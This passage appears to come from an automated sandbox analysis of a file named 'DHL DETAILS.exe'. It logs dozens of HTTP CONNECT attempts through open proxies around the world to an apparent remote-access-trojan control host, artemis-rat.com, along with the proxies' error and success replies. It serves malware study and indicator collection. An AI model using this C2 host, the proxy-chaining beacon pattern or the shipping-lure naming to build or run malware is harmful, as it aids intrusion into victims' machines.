                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    368192.168.2.551108211.222.252.18781936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.513029099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    369192.168.2.551291104.16.105.198806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.518073082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.672277927 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    370192.168.2.551140147.75.34.85100076352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.519256115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.825725079 CET356INHTTP/1.0 502 Bad Gateway
                                                                                    Server: Zscaler/6.3
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    371192.168.2.551229198.199.83.20680006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.520066977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    372192.168.2.55100761.133.66.6990026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.521562099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.921705961 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    373192.168.2.55126613.59.156.16731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.525528908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.742758989 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    374192.168.2.551149103.213.97.74806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.527045965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.192476034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.504091024 CET334INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    375192.168.2.5511071.194.236.22950056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.531193018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.223680973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.560843945 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    376192.168.2.55116516.163.88.228806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.531215906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.837392092 CET668INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 494
                                                                                    Connection: close
                                                                                    ETag: "5d52d17f-1ee"
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 65 72 72 6f 72 20 6c 6f 67 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe error log for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    377192.168.2.551256162.223.116.75806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.532699108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.067466021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.754987001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.177138090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    378192.168.2.55107143.243.141.1982286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.535078049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    379192.168.2.551073187.40.1.1221286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.540513992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.927799940 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    380192.168.2.55118388.99.138.2169696352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.541142941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    381192.168.2.55116691.189.177.18931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.543333054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.862222910 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/5.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3628
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from lb1
                                                                                    X-Cache-Lookup: NONE from lb1:3128
                                                                                    Via: 1.1 lb1 (squid/5.7)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    382192.168.2.551138128.199.202.12280806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.546757936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.364821911 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    383192.168.2.55097727.147.241.134108006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.548754930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    384192.168.2.551316203.32.120.202806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.552300930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.707694054 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    385192.168.2.55123272.195.34.5841456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.555443048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    386192.168.2.550784117.160.250.131806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.564163923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.134532928 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
